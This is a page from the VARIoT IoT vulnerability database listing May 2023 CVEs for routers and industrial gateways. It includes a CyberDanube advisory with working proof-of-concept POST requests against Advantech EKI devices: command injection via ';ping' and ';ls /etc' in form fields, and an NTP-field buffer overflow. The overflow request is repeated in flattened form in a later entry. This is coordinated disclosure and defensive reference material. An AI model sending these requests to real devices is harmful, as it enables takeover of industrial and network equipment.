VARIoT IoT vulnerabilities database


VAR-202305-2099 CVE-2023-32350 OS command injection vulnerability in multiple Teltonika Networks products CVSS V2: -
CVSS V3: 8.8
Severity: HIGH
Versions 00.07.00 through 00.07.03 of Teltonika’s RUT router firmware contain an operating system (OS) command injection vulnerability in a Lua service. An attacker could exploit a parameter in the vulnerable function that calls a user-provided package name by instead providing a package with a malicious name that contains an OS command injection payload. Multiple Teltonika Networks products, such as RUT200, RUT240 and RUT241 firmware, may be put into a denial-of-service (DoS) state.
VAR-202305-2096 CVE-2023-32349 External control of system configuration or settings vulnerability in multiple Teltonika Networks products CVSS V2: -
CVSS V3: 8.8
Severity: HIGH
Version 00.07.03.4 and prior of Teltonika’s RUT router firmware contain a packet dump utility that contains proper validation for filter parameters. However, variables for validation checks are stored in an external configuration file. An authenticated attacker could use an exposed UCI configuration utility to change these variables and enable malicious parameters in the dump utility, which could result in arbitrary code execution. Multiple Teltonika Networks products, such as RUT200, RUT240 and RUT241 firmware, contain a vulnerability related to external control of system configuration or settings. Information may be obtained, information may be altered, and a denial-of-service (DoS) condition may be caused.
VAR-202305-0900 CVE-2023-2649 Tenda AC23 Command Injection Vulnerability CVSS V2: 8.3
CVSS V3: 7.2
Severity: HIGH
A vulnerability was found in Tenda AC23 16.03.07.45_cn. It has been declared as critical. This vulnerability affects unknown code of the file /bin/ate of the component Service Port 7329. The manipulation of the argument v2 leads to command injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-228778 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. Tenda's AC23 firmware contains a command injection vulnerability. Information may be obtained, information may be altered, and a denial-of-service (DoS) condition may be caused. The vulnerability stems from the fact that the parameter v2 of the file /bin/ate fails to properly filter special characters and commands when constructing the command. Attackers can use this vulnerability to cause arbitrary command execution.
VAR-202305-0927 CVE-2023-2646 TP-LINK Technologies Archer C7 firmware vulnerability CVSS V2: 5.0
CVSS V3: 6.5
Severity: MEDIUM
A vulnerability has been found in TP-Link Archer C7v2 v2_en_us_180114 and classified as problematic. Affected by this vulnerability is an unknown functionality of the component GET Request Parameter Handler. The manipulation leads to denial of service. The attack can only be done within the local network. The associated identifier of this vulnerability is VDB-228775. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. TP-LINK Technologies' Archer C7 firmware contains an unspecified vulnerability. A denial-of-service (DoS) condition may be caused.
VAR-202305-0581 CVE-2022-32766 Intel Compute Stick STK2MV64CC firmware vulnerability CVSS V2: -
CVSS V3: 7.8
Severity: HIGH
Improper input validation for some Intel(R) BIOS firmware may allow a privileged user to potentially enable escalation of privilege via local access. Intel's Compute Stick STK2MV64CC firmware contains an unspecified vulnerability. Information may be obtained, information may be altered, and a denial-of-service (DoS) condition may be caused.
VAR-202305-0583 CVE-2023-25771 Vulnerabilities in multiple Intel products CVSS V2: -
CVSS V3: 5.5
Severity: MEDIUM
Improper access control for some Intel(R) NUC BIOS firmware may allow a privileged user to potentially enable denial of service via local access. Multiple Intel products, such as NUC 8 Compute Element CM8i3CB4N, CM8i5CB8N and CM8i7CB8N firmware, contain an unspecified vulnerability. A denial-of-service (DoS) condition may be caused.
VAR-202305-0430 CVE-2023-28832 Command injection vulnerability in Siemens 6GK1411-1AC00 and 6GK1411-5AC00 firmware CVSS V2: 10.0
CVSS V3: 7.2
Severity: HIGH
A vulnerability has been identified in SIMATIC Cloud Connect 7 CC712 (All versions >= V2.0 < V2.1), SIMATIC Cloud Connect 7 CC716 (All versions >= V2.0 < V2.1). The web based management of affected devices does not properly validate user input, making it susceptible to command injection. This could allow an authenticated privileged remote attacker to execute arbitrary code with root privileges. Siemens' 6GK1411-1AC00 and 6GK1411-5AC00 firmware contain a command injection vulnerability. Information may be obtained, information may be altered, and a denial-of-service (DoS) condition may be caused. SIMATIC Cloud Connect 7 is an IoT gateway for connecting programmable logic controllers to cloud services; it allows field devices to be interfaced with OPC UA servers as OPC UA clients.
VAR-202305-0435 CVE-2023-27407 OS command injection vulnerability in Siemens SCALANCE LPE9403 firmware CVSS V2: 10.0
CVSS V3: 9.9
Severity: CRITICAL
A vulnerability has been identified in SCALANCE LPE9403 (All versions < V2.1). The web based management of the affected device does not properly validate user input, making it susceptible to command injection. This could allow an authenticated remote attacker to access the underlying operating system as the root user. Siemens' SCALANCE LPE9403 firmware contains an OS command injection vulnerability. Information may be obtained, information may be altered, and a denial-of-service (DoS) condition may be caused. Siemens SCALANCE LPE9403 is a local processing driver.
VAR-202305-0436 CVE-2023-27408 Vulnerability related to temporary file creation with access permissions in Siemens SCALANCE LPE9403 firmware CVSS V2: 2.1
CVSS V3: 3.3
Severity: LOW
A vulnerability has been identified in SCALANCE LPE9403 (All versions < V2.1). The `i2c` mutex file is created with the permission bits `-rw-rw-rw-`. This file is used as a mutex for multiple applications interacting with i2c. This could allow an authenticated attacker with access to the SSH interface on the affected device to interfere with the integrity of the mutex and the data it protects. Siemens' SCALANCE LPE9403 firmware contains a vulnerability related to temporary file creation with access permissions. Information may be altered. Siemens SCALANCE LPE9403 is a local processing driver.
VAR-202305-0437 CVE-2023-27409 Path traversal vulnerability in Siemens SCALANCE LPE9403 firmware CVSS V2: 1.2
CVSS V3: 3.3
Severity: LOW
A vulnerability has been identified in SCALANCE LPE9403 (All versions < V2.1). A path traversal vulnerability was found in the `deviceinfo` binary via the `mac` parameter. This could allow an authenticated attacker with access to the SSH interface on the affected device to read the contents of any file named `address`. Siemens SCALANCE LPE9403 is a local processing driver
VAR-202304-2153 CVE-2023-20098 Path traversal vulnerability in Cisco Systems Cisco Catalyst SD-WAN Manager and Cisco SD-WAN vManage CVSS V2: -
CVSS V3: 6.0
Severity: MEDIUM
A vulnerability in the CLI of Cisco SDWAN vManage Software could allow an authenticated, local attacker to delete arbitrary files. This vulnerability is due to improper filtering of directory traversal character sequences within system commands. An attacker with administrative privileges could exploit this vulnerability by running a system command containing directory traversal character sequences to target an arbitrary file. A successful exploit could allow the attacker to delete arbitrary files from the system, including files owned by root. Cisco Systems' Cisco Catalyst SD-WAN Manager and Cisco SD-WAN vManage contain a path traversal vulnerability. Information may be altered and a denial-of-service (DoS) condition may be caused. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is available at the following link: sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-vmanage-wfnqmYhN
VAR-202305-0474 CVE-2023-2575 Out-of-bounds write vulnerability in multiple Advantech products CVSS V2: -
CVSS V3: 8.8
Severity: HIGH
Advantech EKI-1524, EKI-1522, EKI-1521 devices through 1.21 are affected by a Stack-based Buffer Overflow vulnerability, which can be triggered by authenticated users via a crafted POST request. Advantech Co., Ltd. EKI-1521, EKI-1522 and EKI-1524 firmware contain an out-of-bounds write vulnerability. Information may be obtained, information may be altered, and a denial-of-service (DoS) condition may be caused.

CyberDanube Security Research 20230511-0
-------------------------------------------------------------------------------
title| Multiple Vulnerabilities
product| EKI-1524-CE series, EKI-1522 series, EKI-1521 series
vulnerable version| 1.21
fixed version| 1.24
CVE number| CVE-2023-2573, CVE-2023-2574, CVE-2023-2575
impact| High
homepage| https://advantech.com
found| 2023-03-06
by| S. Dietz, T. Weber (Office Vienna)
| CyberDanube Security Research
| Vienna | St. Pölten
| https://www.cyberdanube.com
-------------------------------------------------------------------------------

Vendor description
-------------------------------------------------------------------------------
"Advantech's corporate vision is to enable an intelligent planet. The company is a global leader in the fields of IoT intelligent systems and embedded platforms. To embrace the trends of IoT, big data, and artificial intelligence, Advantech promotes IoT hardware and software solutions with the Edge Intelligence WISE-PaaS core to assist business partners and clients in connecting their industrial chains. Advantech is also working with business partners to co-create business ecosystems that accelerate the goal of industrial intelligence."
Source: https://www.advantech.com/en/about

Vulnerable versions
-------------------------------------------------------------------------------
EKI-1524-CE series / 1.21
EKI-1522-CE series / 1.21
EKI-1521-CE series / 1.21

Vulnerability overview
-------------------------------------------------------------------------------
1) Authenticated Command Injection (CVE-2023-2573, CVE-2023-2574)
The web server of the device is prone to two authenticated command injections. These allow an attacker to gain full access to the underlying operating system of the device. This device class can be attached to legacy systems via RS-232, RS-422 or RS-485. Such peripheral systems can be affected by attacks on the device from malicious actors.

2) Buffer Overflow (CVE-2023-2575)
The web server is prone to a buffer overflow, triggered by missing input length validation in the NTP input field. According to the vendor, the NTP server string is expected to be 64 bytes long, which is not correctly checked.

Proof of Concept
-------------------------------------------------------------------------------
1) Authenticated Command Injection
The web server is prone to two authenticated command injections via POST parameters.
The following proof-of-concepts show how to inject commands into the system, which get executed with root permissions in the background:

1.1) Blind Authenticated Command Injection in NTP Server Name (CVE-2023-2573)
The following POST request executes the command ";ping 10.0.0.1" on the system:
===============================================================================
POST /cgi-bin/index.cgi?func=setsys HTTP/1.1
Host: 172.16.0.100
Accept: */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 541
Origin: http://172.16.0.100
Connection: close
Referer: http://172.16.0.100/cgi-bin/index.cgi

web_en=1&resume_idx=0&sys_name=test&sys_desc=&ignr_devid=0&tel_en=1&snmp_en=1&year_name=2023&mon_name=5&day_name=8&hour_name=6&min_name=45&sec_name=18&tz=UTC12%3A0&ntp_name=;ping+10.0.0.1;&dayligt_saving_time=0&start_week=1&start_day=0&start_month=1&start_time=&end_week=1&end_day=0&end_month=1&end_time=&dst_timezone=&slave_port=&redt_num=%25REDTNUM%25&redtID%25REDTNUM%25=%25REDTID%25&priPath%25REDTNUM%25=%25PRIPATH%25&secPath%25REDTNUM%25=%25SECPATH%25&interface=0&virtual_ip=%25VIRTGW_IP%25&id=%25VIRTGW_ID%25&priority=80
===============================================================================
It is also possible to execute this command without any interceptor proxy by enclosing it with ";", which results in the string ";ping 10.0.0.1;".

1.2) Blind Authenticated Command Injection in Device Name (CVE-2023-2574)
The device name can also be abused for command injection. It is only executed on reboot, but this can also be done via the device's web interface.
A POST request which injects the command ";ls /etc;" can look like the following:
===============================================================================
POST /cgi-bin/index.cgi?func=setsys HTTP/1.1
Host: 172.16.0.100
Accept: */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 541
Origin: http://172.16.0.100
Connection: close
Referer: http://172.16.0.100/cgi-bin/index.cgi

web_en=1&resume_idx=0&sys_name=;ls+/etc;&sys_desc=&ignr_devid=0&tel_en=1&snmp_en=1&year_name=2023&mon_name=5&day_name=8&hour_name=6&min_name=45&sec_name=18&tz=UTC12%3A0&ntp_name=&dayligt_saving_time=0&start_week=1&start_day=0&start_month=1&start_time=&end_week=1&end_day=0&end_month=1&end_time=&dst_timezone=&slave_port=&redt_num=%25REDTNUM%25&redtID%25REDTNUM%25=%25REDTID%25&priPath%25REDTNUM%25=%25PRIPATH%25&secPath%25REDTNUM%25=%25SECPATH%25&interface=0&virtual_ip=%25VIRTGW_IP%25&id=%25VIRTGW_ID%25&priority=80
===============================================================================
Such a command can also be injected by setting the device name to ";ls /etc;".
2) Buffer Overflow (CVE-2023-2575)
The following POST request can be used to trigger a buffer overflow vulnerability in the web server:
===============================================================================
POST /cgi-bin/index.cgi?func=setsys HTTP/1.1
Host: 172.16.0.97
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 823
Origin: http://172.16.0.97
Connection: close
Referer: http://172.16.0.97/cgi-bin/index.cgi

web_en=1&resume_idx=0&sys_name=test&sys_desc=&ignr_devid=0&tel_en=1&snmp_en=1&year_name=2023&mon_name=5&day_name=8&hour_name=7&min_name=2&sec_name=52&tz=UTC12%3A0&ntp_name=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&dayligt_saving_time=0&start_week=1&start_day=0&start_month=1&start_time=&end_week=1&end_day=0&end_month=1&end_time=&dst_timezone=&slave_port=&redt_num=%25REDTNUM%25&redtID%25REDTNUM%25=%25REDTID%25&priPath%25REDTNUM%25=%25PRIPATH%25&secPath%25REDTNUM%25=%25SECPATH%25&interface=0&virtual_ip=%25VIRTGW_IP%25&id=%25VIRTGW_ID%25&priority=80
===============================================================================
The serial port of the device provides error messages, which already indicate that the stack has been corrupted:
/ # *** Error in `./index.cgi': free(): invalid next size (normal): 0x00069828 ***
*** Error in `./index.cgi': malloc(): memory corruption: 0x00069898 ***
Furthermore, the forked child processes seem to remain in the process list as zombies - three buffer overflows were triggered in this case:
/ # ps
PID USER COMMAND
[...]
935 root ./index.cgi func=setsys
959 root ./index.cgi func=setsys
983 root ./index.cgi func=setsys
[...]
The vulnerabilities were manually verified on an emulated device by using the MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).

Solution
-------------------------------------------------------------------------------
Update the product to the latest available firmware version.

Workaround
-------------------------------------------------------------------------------
None

Recommendation
-------------------------------------------------------------------------------
CyberDanube recommends Advantech customers to upgrade the firmware to the latest version available.

Contact Timeline
-------------------------------------------------------------------------------
2023-03-08: Contacting Advantech via Service Request form; No answer.
2023-03-13: Contacting Advantech via Czech PSIRT (security@advantech.cz); Vendor confirmed vulnerabilities and will provide a fixed firmware by 2023-05-13. Asked vendor for affected models; Vendor responded that EKI-1524/1522/1521 series are affected.
2023-03-20: Asked for status update.
2023-03-21: Vendor responded that the firmware is currently under testing.
2023-03-31: Vendor stated that firmware is done and sent it via email; Found additional issues and responded to vendor.
2023-04-01: Vendor asked multiple questions.
2023-04-02: Responded to vendor, answered questions and asked for a call; Vendor agreed.
2023-04-04: Set date for a call to 2023-04-10.
2023-04-10: Clarified further issues.
2023-04-23: Vendor sent notification that a beta release of the firmware is available.
2023-05-02: Vendor sent notification that a new firmware release is online.
2023-05-04: Asked vendor if the advisory can be published earlier than agreed.
2023-05-08: Asked for status update; Vendor confirmed that all vulnerabilities have been fixed.
2023-05-11: Coordinated release of security advisory.
Web: https://www.cyberdanube.com
Twitter: https://twitter.com/cyberdanube
Mail: research at cyberdanube dot com
EOF S. Dietz, T. Weber / @2023
VAR-202305-0371 CVE-2023-2573 Command injection vulnerability in multiple Advantech products CVSS V2: -
CVSS V3: 8.8
Severity: HIGH
Advantech EKI-1524, EKI-1522, EKI-1521 devices through 1.21 are affected by a command injection vulnerability in the NTP server input field, which can be triggered by authenticated users via a crafted POST request. Advantech Co., Ltd. EKI-1521, EKI-1522 and EKI-1524 firmware contain a command injection vulnerability. Information may be obtained, information may be altered, and a denial-of-service (DoS) condition may be caused. This CVE is covered by CyberDanube Security Research advisory 20230511-0, reproduced in full under VAR-202305-0474 (CVE-2023-2575) above.
VAR-202305-0471 CVE-2023-29693 Out-of-bounds write vulnerability in H3C GR-1200W firmware CVSS V2: 10.0
CVSS V3: 9.8
Severity: CRITICAL
H3C GR-1200W MiniGRW1A0V100R006 was discovered to contain a stack overflow via the function set_tftp_upgrad. H3C's GR-1200W firmware contains an out-of-bounds write vulnerability. Information may be obtained, information may be altered, and a denial-of-service (DoS) condition may be caused. H3C GR-1200W is a gigabit enterprise wireless router produced by China's H3C. The H3C GR-1200W MiniGRW1A0V100R006 version has a buffer overflow vulnerability. A remote attacker could exploit this vulnerability to execute arbitrary code.
VAR-202305-0444 CVE-2023-2574 Command injection vulnerability in multiple Advantech products CVSS V2: -
CVSS V3: 8.8
Severity: HIGH
Advantech EKI-1524, EKI-1522, EKI-1521 devices through 1.21 are affected by a command injection vulnerability in the device name input field, which can be triggered by authenticated users via a crafted POST request. Advantech Co., Ltd. EKI-1521, EKI-1522 and EKI-1524 firmware contain a command injection vulnerability. Information may be obtained, information may be altered, and a denial-of-service (DoS) condition may be caused. This CVE is covered by CyberDanube Security Research advisory 20230511-0, reproduced in full under VAR-202305-0474 (CVE-2023-2575) above.
2) Buffer Overflow (CVE-2023-2575) The following POST request can be used to trigger a buffer overflow vulnerability in the web server: =============================================================================== POST /cgi-bin/index.cgi?func=setsys HTTP/1.1 Host: 172.16.0.97 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: */* Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 823 Origin: http://172.16.0.97 Connection: close Referer: http://172.16.0.97/cgi-bin/index.cgi web_en=1&resume_idx=0&sys_name=test&sys_desc=&ignr_devid=0&tel_en=1&snmp_en=1&year_name=2023&mon_name=5&day_name=8&hour_name=7&min_name=2&sec_name=52&tz=UTC12%3A0&ntp_name=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&dayligt_saving_time=0&start_week=1&start_day=0&start_month=1&start_time=&end_week=1&end_day=0&end_month=1&end_time=&dst_timezone=&slave_port=&redt_num=%25REDTNUM%25&redtID%25REDTNUM%25=%25REDTID%25&priPath%25REDTNUM%25=%25PRIPATH%25&secPath%25REDTNUM%25=%25SECPATH%25&interface=0&virtual_ip=%25VIRTGW_IP%25&id=%25VIRTGW_ID%25&priority=80 =============================================================================== The serial port of the device provides error messages, which already indicate that the stack has been corrupted: / # *** Error in `./index.cgi': free(): invalid next size (normal): 0x00069828 *** *** Error in `./index.cgi': malloc(): memory corruption: 0x00069898 *** Furthermore, the forked child processes seem to remain in the process list as zombies - three buffer overflows were triggered in this case: / # ps PID USER COMMAND [...] 
935 root ./index.cgi func=setsys 959 root ./index.cgi func=setsys 983 root ./index.cgi func=setsys [...] The vulnerabilities were manually verified on an emulated device by using the MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com). Solution ------------------------------------------------------------------------------- Update the product to the latest available firmware version. Workaround ------------------------------------------------------------------------------- None Recommendation ------------------------------------------------------------------------------- CyberDanube recommends Advantech customers to upgrade the firmware to the latest version available. Contact Timeline ------------------------------------------------------------------------------- 2023-03-08: Contacting Advantech via Service Request form; No answer. 2023-03-13: Contacting Advantech via Czech PSIRT (security@advantech.cz); Vendor confirmed vulnerabilities and will provide a fixed firmware until 2023-05-13. Asked vendor for affected models; Vendo responded that EKI-1524/1522/1521 series are affected. 2023-03-20: Asked for status update. 2023-03-21: Vendor responded that the firmware is currently under testing. 2023-03-31: Vendor statet, that firmware is done and sent it via email; Found additional issues and responded to vendor. 2023-04-01: Vendor asked multiple question. 2023-04-02: Responded to vendor, answered questions and asked for a call; Vendor agreed. 2023-04-04: Set date for a call to 2023-04-10. 2023-04-10: Clarified further issues. 2023-04-23: Vendor sent notification that a beta release of the firmware is available. 2023-05-02: Vendor sent notification that a new firmware release is online. 2023-05-04: Asked vendor if the advisory can be published earlier than agreed. 2023-05-08: Asked for status update; Vendor confirmed that all vulnerabilities have been fixed. 2023-05-11: Coordinated release of security advisory. 
Web: https://www.cyberdanube.com Twitter: https://twitter.com/cyberdanube Mail: research at cyberdanube dot com EOF S. Dietz, T. Weber / @2023
VAR-202305-0517 CVE-2023-31129 Contiki-NG  In  NULL  Pointer dereference vulnerability CVSS V2: -
CVSS V3: 9.8
Severity: CRITICAL
The Contiki-NG operating system versions 4.8 and prior can be triggered to dereference a NULL pointer in the message handling code for IPv6 router solicitations. Contiki-NG contains an implementation of IPv6 Neighbor Discovery (ND) in the module `os/net/ipv6/uip-nd6.c`. The ND protocol includes a message type called Router Solicitation (RS), which is used to locate routers and update their address information via the SLLAO (Source Link-Layer Address Option). If the indicated source address changes, a given neighbor entry is set to the STALE state. When handling an RS message whose SLLAO indicates a link-layer address change, the message handler does not check that a neighbor entry could actually be created for the indicated address. The resulting pointer is used without a check, leading to the dereference of a NULL pointer of type `uip_ds6_nbr_t`. The problem has been patched in the `develop` branch of Contiki-NG, and will be included in the upcoming 4.9 release. As a workaround, users can apply Contiki-NG pull request #2271 to patch the problem directly. Contiki-NG contains a NULL pointer dereference vulnerability. Information may be obtained, information may be tampered with, and a denial-of-service (DoS) condition may result. Contiki-NG is an open-source, cross-platform operating system for next-generation IoT (Internet of Things) devices
VAR-202305-2974 No CVE TOTOLINK X5000R has a command execution vulnerability (CNVD-2023-40539) CVSS V2: 7.1
CVSS V3: -
Severity: HIGH
TOTOLINK X5000R is a gigabit dual-band WiFi6 router. There is a command execution vulnerability in TOTOLINK X5000R, which can be exploited by attackers to execute arbitrary commands.
VAR-202305-2980 No CVE Hangzhou Anheng Information Technology Co., Ltd. Mingyu Security Gateway has a command execution vulnerability (CNVD-2023-03898) CVSS V2: 10.0
CVSS V3: -
Severity: HIGH
Mingyu Security Gateway builds a next-generation security protection system for full-process defense, integrating traditional firewalls, intrusion detection, intrusion prevention systems, anti-virus gateways, Internet behavior control, VPN gateways, threat intelligence and other security modules into an intelligent security gateway. There is a command execution vulnerability in the Mingyu Security Gateway of Hangzhou Anheng Information Technology Co., Ltd. Attackers can use this vulnerability to execute arbitrary commands.
VAR-202305-0367 CVE-2023-30054 TOTOLINK A7100RU Operating system command injection vulnerability CVSS V2: -
CVSS V3: 9.8
Severity: CRITICAL
TOTOLINK A7100RU V7.4cu.2313_B20191024 has a Command Injection vulnerability. An attacker can obtain a stable root shell through a specially constructed payload
VAR-202305-0316 CVE-2023-30053 TOTOLINK A7100RU Operating system command injection vulnerability CVSS V2: -
CVSS V3: 9.8
Severity: CRITICAL
TOTOLINK A7100RU V7.4cu.2313_B20191024 is vulnerable to Command Injection